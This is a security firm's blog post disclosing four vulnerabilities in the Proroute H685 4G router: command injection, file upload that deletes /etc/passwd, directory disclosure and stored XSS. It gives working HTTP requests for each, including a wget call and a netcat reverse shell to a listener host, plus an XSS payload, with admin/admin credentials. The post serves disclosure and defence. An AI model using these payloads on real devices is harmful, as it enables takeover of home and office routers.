When penetration testing career and hobby collide: IoT testing

When penetration testing career and hobby collide: IoT testing

- Cyber security - Penetration testing

30-11-2021


Penetration Testers take penetration testing very seriously; so much so, that for many, it’s a career and a hobby. When they take off their work hat and put on their leisure hat, they aren’t really changing much. The good thing about that is vulnerabilities in the everyday items we use get found and our information stays secure for a bit longer. Especially since, threat actors tend to spend a fair amount of time looking for those non-obvious entry points that may not be found without a lot of trial and error.

The team decided to share a few of their IoT tests to highlight that we still have a long way to go when it comes to making the small things as secure as the big things.

In this example, we look at the Proroute H685 4G router, which you may find in many homes (and even offices) because it offers high speed 4G mobile broadband internet connectivity.

After testing and finding several vulnerabilities, we contacted Proroute to inform them. We let them know that we would publish our findings, allowing them time to issue a patch.

Non-technical overview

For our non-technical readers (who are still interested in learning about the vulnerabilities), we found:

  1. Command injection vulnerability – This can allow an attacker to execute arbitrary commands on an operating system, which can result in an attacker gaining complete control.
  2. Insecure file upload vulnerability – This can allow an attacker to upload a malicious file to a system, which can result in a malware infection.
  3. Information disclosure vulnerability – Websites and devices with this vulnerability unintentionally leak information (such as technical details which would give an attacker the information they needed to launch their attack).
  4. Cross-Site Scripting (XSS) vulnerability – This enables an attacker to embed malicious scripts into trusted websites, which can result in users downloading malware or viruses on to their computers.

Now for the technical part:

1.  Command Injection:

The application has an authenticated command injection vulnerability; an attacker can leverage this to gain remote command execution on the host, which can result in them taking control of the system, able to run any commands that a legitimate owner could.

This vulnerability arises from the lua script named ‘sms_send.lua’. From the below screenshot, the ‘number’ and ‘text’ attribute is insecurely passed to the ‘luci.util.exec’ function. This insecure handling of user-supplied data leads to remote command execution on the host.

For an attacker to achieve the required situation the victim would need to have the SMS Gateway enabled and the attacker would need to know a valid set of credentials (for this example the credentials have been set to username = admin and password = admin).

Proof of concept

Below are two examples relating to this vulnerability.  Example 1 will show that the ‘wget’ command can run on the remote device. Example 2 shows how this can be leveraged to gain a remote shell on the device.

To facilitate both examples, a netcat listener is configured on port 9090 for incoming connections.

Example 1:

Below is the request that will take advantage of the vulnerability and force the host to perform a ‘wget’ to the netcat listener.

POST /cgi-bin/sms_send HTTP/1.1
Host: 192.168.8.1
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

username=admin&password=admin&number=1&text=j$(`wget%20http://192.168.8.111:9090/test`)

Once sent, referring back to the netcat shows that a connection is established by the remote device.

Example 2:

Below is the request that will take advantage of the vulnerability and force the host to establish a reverse shell with the netcat listener.

POST /cgi-bin/sms_send HTTP/1.1
Host: 192.168.8.1
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

username=admin&password=admin&number=1&text=j$(`rm%20/tmp/f;mknod%20/tmp/f%20p;cat%20/tmp/f|/bin/sh%20-i%202>%261|nc%20192.168.8.111%209090%20>/tmp/f`)

Once sent, referring back to the netcat shows that a connection is established by the remote device.

2.  Insecure file upload

This issue is present within the image upload function on the OEM section of the application. A malicious attacker can use this functionality to overwrite key system files on the host causing a denial of service (DOS), which can result in the device failing to operate in it’s intended capacity..

For an attacker to achieve this, they would need valid credentials to the OEM section of the application. This is decreases the attack surface somewhat, but passwords are easily found/hacked.

Proof of concept

For this example, we replaced the passwd file located in the /etc/ directory. This file was chosen because it would have a detrimental effect on the web service. Before performing this proof of concept, we took a copy of the passwd file.

Inside of the ‘OEM Configuration’ section there is the ‘picture configuration’ section.

Click the icon with the eye. Capturing the request in BurpSuite will show its attributes.

Send the request to the repeater and navigate to the section name ‘cbid.sys.picture.logo’.

Change the data to ‘/etc/passwd’ and click send to remove the ‘passwd’ file.

Once the page is refreshed, we can see the following lua error message:

Listing the /etc/directory via SSH shows the file has been deleted:

Copying back the passwd file will counteract the changes we made:

3.  Information disclosure

The device allows authenticated users read access to the device’s folder structure. This issue arises from the ‘filebrowser.lua’ file. This could result in the leakage of information through the file names seen.

For an attacker to access this leaked information, all they need is valid credentials for the web application, which are often easy to guess or hack.

Proof of concept

The below examples show that navigating the ‘filebrowser’ section allows for the viewing of files and folders. Please note that during testing it was not possible to read any of the files, only navigate its structure. However, from this it wouldn’t take long for an attacker to find a work around.

4.  Cross Site Scripting (XSS)

The device is susceptible to a stored cross site scripting vulnerability. An authenticated attacker could submit a malicious query to the ‘sms_send’ endpoint. This would then be executed when read from the ‘sms_list’ endpoint. This could result in a websites content being modified by a third party.

For an attacker to achieve this they would need to have the SMS Gateway enabled and they would need to know a valid set of credentials (for this example the credentials have been set to username = admin and password = admin).

Proof of concept

When the below malicious request is submitted to the ‘sms_send’ endpoint, it saves the content within its logs.

POST /cgi-bin/sms_send HTTP/1.1
Host: 192.168.8.1
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

username=admin&password=admin&number=1&text=j<script>alert(0)</script>

Requesting the endpoint ‘sms_list’ will gather these logs and load them on screen without sanitising any data, causing the malicious JavaScript to execute.

To wrap up

This device has a number of vulnerabilities that compromise its security and therefore the security of user data. These may be mitigated in firmware updates to the device, but for those who do not patch, these problems will persist until the device is removed from their network.

As you may have already seen in the media over the last few years, the security standards for IoT devices deployed to consumer households to ensure safety have not yet been matured and enforced, and this situation is likely to continue. Proroute is far from the only vendor with such issues; we have seen far worse from other manufacturers. However, consumers trust us as an industry to provide mature solutions, and we need to consider the sustainability of releasing devices with fundamental flaws. 

Talk to us about penetration testing: sales@pgitl.com or +44 (0)845 600 4403

Ready to get started? Speak to one of our experts.

If you have any questions about our services or would like to learn more about our consultants here at PGI, please get in touch with us and speak with one of the team, call us on +44 (0)845 600 4403 or email us at sales@pgitl.com

Get in touch

Want to find out more?